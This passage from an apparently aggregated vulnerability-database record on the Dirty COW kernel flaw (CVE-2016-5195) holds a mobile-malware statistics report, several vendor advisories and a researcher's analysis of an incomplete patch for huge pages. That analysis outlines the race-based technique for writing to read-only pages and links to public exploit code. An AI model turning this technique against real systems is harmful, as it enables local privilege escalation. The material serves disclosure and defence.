In second place came the verdict Trojan.AndroidOS.Boogr.gsh (10.95%). This verdict is assigned to files recognized as malicious by our ML-based system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (5.08%, fourth place in the rating). This verdict is assigned to files whose structure is identical to that of malicious files.

Third, sixth, and sixteenth places were taken by members of the Hiddapp family.
We assign this verdict to any app that hides its icon in the list of apps immediately after starting. Subsequent actions of such apps may be anything from downloading or dropping other apps to displaying ads.

Fifth and thirteenth places went to members of the Necro family of droppers and loaders. In both threat classes, Necro members did not make it into the Top 10 by number of detected files. Even the weakened Hqwar family of droppers strongly outperformed Necro by number of generated objects. That said, users often encountered Necro members due to the family's penetration of Google Play.

Seventh and tenth places went to the Asacub family of banking Trojans. Whereas at the start of the year the Trojan's operators were still actively spreading the malware, starting in March 2019 we noticed a drop in this family's activity.

_Number of unique users attacked by the Asacub mobile banking Trojan in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152434/mobile_report_2019_09-en-asacub-attacks.png>)

Eighth and fourteenth places were reserved for droppers in the Hqwar family. Their activity dropped significantly, from 80,000 attacked users in 2018 to 28,000 in 2019. However, we continue to register infection attempts by this family, and do not rule out its return to the top.

_Number of unique users attacked by the Hqwar mobile dropper in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152439/mobile_report_2019_10-en-hqwar-attacks.png>)

In ninth position is another dropper, this time from the Lezok family: Trojan-Dropper.AndroidOS.Lezok.p (1.76%). A notable difference between this Trojan and Hqwar is that the malware penetrates the device before it arrives at the store. This is evidenced by KSN statistics showing that the Trojan was most often detected in the system directory under the names PhoneServer, GeocodeService, and similar.
# | Path to the detected threat | Number of unique users attacked
---|---|---
1 | /system/priv-app/PhoneServer/ | 49,688
2 | /system/priv-app/GeocodeService/ | 9,747
3 | /system/priv-app/Helper/ | 6,784
4 | /system/priv-app/com.android.telephone/ | 5,030
5 | /system/priv-app/ | 1,396
6 | /system/priv-app/CallerIdSearch/ | 1,343

When the device is turned on, Lezok dumps its payload into the system; it does so even if the victim deletes the dumped files using regular OS tools or resets the device to the factory settings. The trick is that the Trojan forms part of the factory firmware and can reload (restore) the deleted files.

The final Trojan worthy of attention is Trojan-Downloader.AndroidOS.Helper.a (1.56%), which finished eleventh in the rankings. Despite claims to the contrary, it can be removed. However, the infected system contains another Trojan that installs a helper app, which cannot be removed that easily. According to KSN statistics, members of the Trojan-Downloader.AndroidOS.Triada and Trojan.AndroidOS.Dvmap families can act as delivery vehicles for the helper. After the victim removes the helper, a member of one of these two families loads and reinstalls it.

### Mobile banking Trojans

In 2019, we detected 69,777 installation packages for mobile banking Trojans, half of last year's figure. However, the share of banking Trojans out of all detected threats grew slightly as a consequence of the declining activity of other classes and families of mobile malware.

_Number of installation packages of mobile banking Trojans detected by Kaspersky in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152443/mobile_report_2019_11-bankers-install-packages.png>)

The number of detected installation packages for banking Trojans, as well as the number of attacks, was influenced by the campaign to distribute the Asacub Trojan, whose activity plummeted starting in April 2019.
_Number of attacks by mobile banking Trojans in 2018–2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152448/mobile_report_2019_12-en-bankers-attacks.png>)

It is worth noting that the average number of attacks over the year was approximately 270,000 per month.

**Top 10 countries by share of users attacked by banking Trojans**

# | Country | %*
---|---|---
1 | Russia | 0.72
2 | South Africa | 0.66
3 | Australia | 0.59
4 | Spain | 0.29
5 | Tajikistan | 0.21
6 | Turkey | 0.20
7 | USA | 0.18
8 | Italy | 0.17
9 | Ukraine | 0.17
10 | Armenia | 0.16

_*Share of users attacked by mobile bankers out of all attacked users_

Russia (0.72%) has headed our Top 10 for three consecutive years: many different Trojan families are focused on stealing credentials from Russian banking apps. These Trojans operate in other countries as well. Thus, Asacub is the number one threat in Tajikistan, Ukraine, and Armenia, while the Svpeng family of Trojans is active in Russia and the US.

In South Africa (0.66%), the most common Trojan was Trojan-Banker.AndroidOS.Agent.dx, accounting for 95% of all users attacked by banking threats.
The most widespread Trojan in Australia (0.59%) was Trojan-Banker.AndroidOS.Agent.eq (77% of all users attacked by banking threats).

In Spain (0.29%), banking malware from the Cebruser and Trojan-Banker.AndroidOS.Agent.ep families is popular with cybercriminals (49% and 22% of all users attacked by banking threats, respectively).

**Top 10 families of mobile bankers in 2019**

# | Family | %*
---|---|---
1 | Asacub | 44.40
2 | Svpeng | 22.40
3 | Agent | 19.06
4 | Faketoken | 12.02
5 | Hqwar | 3.75
6 | Anubis | 2.72
7 | Marcher | 2.07
8 | Rotexy | 1.46
9 | Gugi | 1.34
10 | Regon | 1.01

_*Share of users attacked by this family of mobile bankers out of all users attacked by mobile banking Trojans_

### Mobile ransomware Trojans

In 2019, we detected 68,362 installation packages for ransomware Trojans, which is 8,186 more than in the previous year. However, we observed a decline in the generation of new ransomware packages throughout 2019. The minimum was recorded in December.

_Number of new installation packages for mobile banking Trojans in Q1–Q4 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152452/mobile_report_2019_13-ransomware-packages.png>)

A similar picture is seen for attacked users.
Whereas in early 2019 the number of attacked users peaked at 12,004, by the end of the year the figure had fallen by a factor of 2.6.

_Number of users attacked by mobile ransomware Trojans in 2018–2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152457/mobile_report_2019_14-en-ransom-attack-users.png>)

_Countries by share of users attacked by mobile ransomware in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152502/mobile_report_2019_15-en-ransomware-geo.png>)

**Top 10 countries by share of users attacked by ransomware Trojans**

# | Country* | %**
---|---|---
1 | USA | 2.03
2 | Kazakhstan | 0.56
3 | Iran | 0.37
4 | Mexico | 0.11
5 | Saudi Arabia | 0.10
6 | Pakistan | 0.10
7 | Canada | 0.10
8 | Italy | 0.09
9 | Indonesia | 0.08
10 | Australia | 0.06

_*Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period._
_**Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._

For the third year in a row, first place by share of users attacked by mobile ransomware went to the US (2.03%). As last year, the Svpeng ransomware family was the most commonly encountered in the country. It was also the most widespread in Iran (0.37%).

The situation in Kazakhstan (0.56%) was unchanged: the country still ranks second, and the most prevalent threat there remains the Rkor family.

## Conclusion

The year 2019 saw the appearance of several highly sophisticated mobile banking threats, in particular malware that can interfere with the normal operation of banking apps. The danger they pose cannot be overstated, because they cause direct losses to the victim.
It is highly likely that this trend will continue into 2020, and we will see more such high-tech banking Trojans.

Also in 2019, attacks involving the use of mobile stalkerware became more frequent, the purpose being to monitor and collect information about the victim. In terms of sophistication, stalkerware is keeping pace with its malware cousins. It is quite likely that 2020 will see an increase in the number of such threats, with a corresponding rise in the number of attacked users.

Judging by our statistics, adware is gaining ever more popularity among cybercriminals. In all likelihood, going forward we will encounter new members of this class of threats, with the worst-case scenario involving adware modules pre-installed on victims' devices.

", "modified": "2020-02-25T10:00:43", "published": "2020-02-25T10:00:43", "id": "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE", "href": "https://securelist.com/mobile-malware-evolution-2019/96280/", "type": "securelist", "title": "Mobile malware evolution 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package", "modified": "2016-10-22T17:20:39", "published": "2016-10-22T17:20:39", "id": "FEDORA:800BC60776C5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.9-200.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-18T01:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings.
A local attacker could use this to gain administrative privileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-1", "href": "https://ubuntu.com/security/notices/USN-3106-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-1", "href": "https://ubuntu.com/security/notices/USN-3104-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "### Overview

The Linux kernel since version 2.6.22 contains a race condition in the way the copy-on-write mechanism is handled by the memory subsystem, which may be leveraged locally to gain root privileges.

### Description

[**CWE-362**](<https://cwe.mitre.org/data/definitions/362.html>)**: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') -** CVE-2016-5195

The Linux kernel since version 2.6.22 contains a race condition in the way the copy-on-write mechanism is handled by the memory subsystem. A local attacker may leverage this vulnerability in affected systems to gain root privileges. For more information, including proofs of concept, refer to the [Dirty COW disclosure page](<https://dirtycow.ninja/>).

Note that this vulnerability is reported as being actively exploited in the wild.
---

### Impact

A local, unprivileged attacker can escalate privileges to root.

---

### Solution

**Apply an update**

Linux kernel versions [4.8.3](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>), [4.7.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>), and [4.4.26](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>) address this vulnerability. [Red Hat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) have released patches. Users should apply patches through their Linux distributions' normal update process.

---

### Vendor Information

Status of the 16 vendors tracked in this note. Unless a statement is quoted below, CERT/CC had not received a statement from the vendor and was not aware of further vendor information regarding this vulnerability.

Vendor | Status | Notified | Updated | Vendor references
---|---|---|---|---
CentOS | Affected | October 21, 2016 | October 27, 2016 | <https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10>
CoreOS | Affected | October 21, 2016 | October 24, 2016 | <https://coreos.com/blog/CVE-2016-5195.html>
Debian GNU/Linux | Affected | October 21, 2016 | October 24, 2016 | <https://www.debian.org/security/2016/dsa-3696>, <https://security-tracker.debian.org/tracker/CVE-2016-5195>
Red Hat, Inc. | Affected | October 21, 2016 | October 21, 2016 | <https://access.redhat.com/security/cve/cve-2016-5195>
SUSE Linux | Affected | October 21, 2016 | October 24, 2016 | <https://www.suse.com/security/cve/CVE-2016-5195.html>
Ubuntu | Affected | October 21, 2016 | October 24, 2016 | <https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>
Arista Networks, Inc. | Not Affected | October 21, 2016 | October 24, 2016 | <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>
Peplink | Not Affected | not listed | November 17, 2016 | <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>
Arch Linux | Unknown | October 21, 2016 | October 21, 2016 |
Fedora Project | Unknown | October 21, 2016 | October 21, 2016 |
Gentoo Linux | Unknown | October 21, 2016 | October 21, 2016 |
Openwall GNU/*/Linux | Unknown | October 21, 2016 | October 21, 2016 |
Slackware Linux Inc. | Unknown | October 21, 2016 | October 21, 2016 |
Tizen | Unknown | October 21, 2016 | October 21, 2016 |
Turbolinux | Unknown | October 21, 2016 | October 21, 2016 |
openSUSE project | Unknown | October 21, 2016 | October 21, 2016 |

**SUSE Linux vendor statement:** SUSE and the openSUSE project are affected by this issue and we have released updates. <https://www.suse.com/security/cve/CVE-2016-5195.html>

**Arista Networks, Inc. vendor statement (Statement Date: October 24, 2016):** Arista Network's software products EOS and Cloud Vision Portal (CVP) are not exploitable by CVE-2016-5195 (Kernel Local Privilege Escalation). For further information: <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>

**Peplink vendor statement (Statement Date: November 17, 2016):** Wanting to state that Peplink Pepwave products are not affected by Dirty COW. Our own announcement: <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>

### CVSS Metrics

Group | Score | Vector
---|---|---
Base | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C
Temporal | 5.6 | E:F/RL:OF/RC:C
Environmental | 5.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND

### References

 * <https://dirtycow.ninja/>
 * <https://access.redhat.com/security/cve/cve-2016-5195>
 * <https://security-tracker.debian.org/tracker/CVE-2016-5195>
 * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>
 * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>
 * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>
 * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>
 * <https://cwe.mitre.org/data/definitions/362.html>

### Acknowledgements

Red Hat credits Phil Oester with reporting this vulnerability.

This document was written by Joel Land.

### Other Information

**CVE IDs:** | [CVE-2016-5195](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-5195>)
---|---
**Date Public:** | 2016-10-20
**Date First Published:** | 2016-10-21
**Date Last Updated:** | 2016-11-17 13:17 UTC
**Document Revision:** | 15
",
"modified": "2016-11-17T13:17:00", "published": "2016-10-21T00:00:00", "id": "VU:243144", "href": "https://www.kb.cert.org/vuls/id/243144", "type": "cert", "title": "Linux kernel memory subsystem copy on write mechanism contains a race condition vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "description": "Added: 10/27/2016
CVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>)
BID: [93793](<http://www.securityfocus.com/bid/93793>)

### Background

This tool allows you to overwrite an arbitrary file on Linux systems.

### Problem

A race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system.

### Resolution

Upgrade to a fixed kernel package from your Linux vendor.

### References

<http://dirtycow.ninja/>
<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c>

### Limitations

Exploit requires an existing unprivileged connection to the target.
### Platforms

Linux

", "edition": 4, "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "id": "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "title": "Linux Dirty COW Local File Overwrite", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:40:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability in the memory manager functions of the Linux Kernel could allow unauthenticated, local attackers to gain write access to otherwise read-only memory mappings to increase their privileges on the system.

The vulnerability is due to a race condition in the memory manager functions of the Linux Kernel. An attacker could exploit this vulnerability by racing the madvise (MADV_DONTNEED) system call. An exploit could allow the attacker to gain write access to otherwise read-only memory mappings. A local user could modify on-disk binaries, bypassing the standard permission mechanisms.

On October 19, 2016, a new vulnerability related to a race condition in the memory manager of the Linux Kernel was disclosed. This vulnerability could allow unprivileged, local users to gain write access to otherwise read-only memory mappings to increase their privileges on the system.

Cisco has released software updates that address this vulnerability.
For information about affected and fixed software releases, consult the Cisco bug IDs in the Vulnerable Products table.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "modified": "2018-08-16T13:48:18", "published": "2016-10-26T15:00:00", "id": "CISCO-SA-20161026-LINUX", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "type": "cisco", "title": "Vulnerability in Linux Kernel Affecting Cisco Products: October 2016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "description": "The "Dirty COW" vulnerability ([CVE-2016-5195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers, was vulnerable. The impact was vast — millions of users could be compromised easily and reliably, bypassing common exploit defenses.

Plenty of information was published about the vulnerability, but its patch was not analyzed in detail.

We at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.

### "Dirty COW" recap

First, we need a full understanding of the original Dirty COW exploit. We'll assume basic understanding of the Linux memory manager.
We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? 
i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). 
In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit; however, the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE` flag is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact that we went through a COW cycle. 
On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux uses 4096-byte pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is 2MB long. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-byte pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mappings only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some of the kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. 
Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pmd` was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. 
Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a pattern similar to the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target; however, once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed-out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. 
Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. 
